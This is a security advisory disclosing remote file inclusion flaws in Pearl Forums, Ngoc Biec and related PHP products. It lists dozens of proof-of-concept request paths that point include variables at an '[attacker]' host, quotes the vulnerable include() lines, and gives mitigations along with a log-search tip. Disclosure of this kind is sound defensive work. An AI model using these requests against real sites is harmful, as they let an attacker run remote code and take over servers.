Pearl Products Multiple Remote File Inclusion Discovered By zero [Moroccan Security Team] Affected software: Pearl Forums 2.4 Ngoc Biec 1.4 Pearl For Biz 2.4 Pearl For Mambo 1.6 URL : http://sourceforge.net/projects/pearlforums/ Risk : High Impact: System access ------[ PoC ]----------------------------------------- /index.php?Document[languagePreference]=[attacker] /index.php?includesDirectory=[attacker] /index.php?templatesDirectory=[attacker] /includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminBanned.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminBoards.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminDocumentation.php?Document[languagePreference]=[attacker] /includes/adminEmails.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminErrorlogs.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminForums.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminGroups.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminMembers.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminPolls.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminReserved.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminSensored.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminSettings.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[attacker] /includes/help.php?Document[languagePreference]=[attacker] /includes/initialize.php?GlobalSettings[templatesDirectory]=[attacker] /includes/locale.php?GlobalSettings[templatesDirectory]=[attacker] /includes/login.php?GlobalSettings[templatesDirectory]=[attacker] /includes/members.php?GlobalSettings[templatesDirectory]=[attacker] 
/includes/merge.php?GlobalSettings[templatesDirectory]=[attacker] /includes/move.php?GlobalSettings[templatesDirectory]=[attacker] /includes/notify.php?GlobalSettings[templatesDirectory]=[attacker] /includes/password.php?GlobalSettings[templatesDirectory]=[attacker] /includes/password.php?Document[languagePreference]=[attacker] /includes/poll.php?GlobalSettings[templatesDirectory]=[attacker] /includes/post.php?GlobalSettings[templatesDirectory]=[attacker] /includes/profile.php?GlobalSettings[templatesDirectory]=[attacker] /includes/register.php?GlobalSettings[templatesDirectory]=[attacker] /includes/search.php?GlobalSettings[templatesDirectory]=[attacker] /includes/split.php?GlobalSettings[templatesDirectory]=[attacker] /includes/terms.php?Document[languagePreference]=[attacker] /includes/topics.php?GlobalSettings[templatesDirectory]=[attacker] So if register_globals=on, a remote attacker can inject arbitrary values into the variables Document[languagePreference], GlobalSettings[templatesDirectory] or GlobalSettings[includesDirectory] through request parameters; each script listed above then uses the injected value as the path prefix of an include()/include_once() call, as the excerpts below show. ---[ Vuln Code ]-------------------------------------- [code index.php] 24. include("$Document[languagePreference]/lang.php"); 28. include("$includesDirectory/initialize.php"); 35. include("$templatesDirectory/master.php"); [/code] [code /includes/adminAttachments.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminAttachments.php"); [/code] [code /includes/adminAvatars.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminAvatars.php"); [/code] [code /includes/adminBackupdatabase.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminBackupdatabase.php"); [/code] [code /includes/adminBanned.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminBanned.php"); [/code] [code /includes/adminBoards.php] 21. include_once("$GlobalSettings[templatesDirectory]/adminBoards.php"); [/code] [code /includes/adminDocumentation.php] 18. 
include_once("$Document[languagePreference]/documentation.php"); [/code] [code /includes/adminEmails.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminEmails.php"); [/code] [code /includes/adminErrorlogs.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminErrorlogs.php"); [/code] [code /includes/adminForums.php] 21. include_once("$GlobalSettings[templatesDirectory]/adminForums.php"); [/code] [code /includes/adminGroups.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminGroups.php"); [/code] [code /includes/adminMembers.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminMembers.php"); [/code] [code /includes/adminPolls.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminPolls.php"); [/code] [code /includes/adminReserved.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminReserved.php"); [/code] [code /includes/adminSensored.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminSensored.php"); [/code] [code /includes/adminSettings.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminSettings.php"); [/code] [code /includes/adminSmileys.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminSmileys.php"); [/code] [code /includes/help.php] 18. include_once("$Document[languagePreference]/help.php"); [/code] [code /includes/initialize.php] 47. include_once("$GlobalSettings[templatesDirectory]/master.php"); [/code] [code /includes/locale.php] 18. include_once("$GlobalSettings[templatesDirectory]/locale.php"); [/code] [code /includes/login.php] 39. include_once("$GlobalSettings[templatesDirectory]/login.php"); [/code] [code /includes/members.php] 19. include_once("$GlobalSettings[templatesDirectory]/members.php"); [/code] [code /includes/merge.php] 18. include_once("$GlobalSettings[templatesDirectory]/merge.php"); [/code] [code /includes/move.php] 18. include_once("$GlobalSettings[templatesDirectory]/move.php"); [/code] [code /includes/notify.php] 18. 
include_once("$GlobalSettings[templatesDirectory]/notify.php"); [/code] [code /includes/password.php] 19. include_once("$GlobalSettings[templatesDirectory]/password.php"); 20. include_once("$Document[languagePreference]/passwordMessages.php"); [/code] [code /includes/poll.php] 18. include_once("$GlobalSettings[templatesDirectory]/poll.php"); [/code] [code /includes/post.php] 18. include_once("$GlobalSettings[templatesDirectory]/post.php"); [/code] [code /includes/profile.php] 18. include_once("$GlobalSettings[templatesDirectory]/profile.php"); [/code] [code /includes/register.php] 18. include_once("$GlobalSettings[templatesDirectory]/register.php"); [/code] [code /includes/search.php] 19. include_once("$GlobalSettings[templatesDirectory]/search.php"); [/code] [code /includes/split.php] 18. include_once("$GlobalSettings[templatesDirectory]/split.php"); [/code] [code /includes/terms.php] 18. include_once("$Document[languagePreference]/termsContents.php"); [/code] [code /includes/topics.php] 18. include_once("$GlobalSettings[templatesDirectory]/topics.php"); [/code] - Solution ------------------------------------------------------ declare variables: initialize Document[languagePreference], GlobalSettings[templatesDirectory], includesDirectory and templatesDirectory to fixed, trusted values in each script before the include()/include_once() call that uses them, so that request parameters cannot supply them. Running PHP with register_globals=off removes the precondition stated above, and disabling allow_url_include (and allow_url_fopen where it is not needed) keeps include() from loading remote URLs. Requests whose query string sets any of these parameter names are worth searching for in web server logs. - Greetz ------------------------------------------------------ simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure, hunter, themenotor ... - Contact ------------------------------------------------------ Author: Mourad [ zero ] Email : xzerox(at)linuxmail(dot)org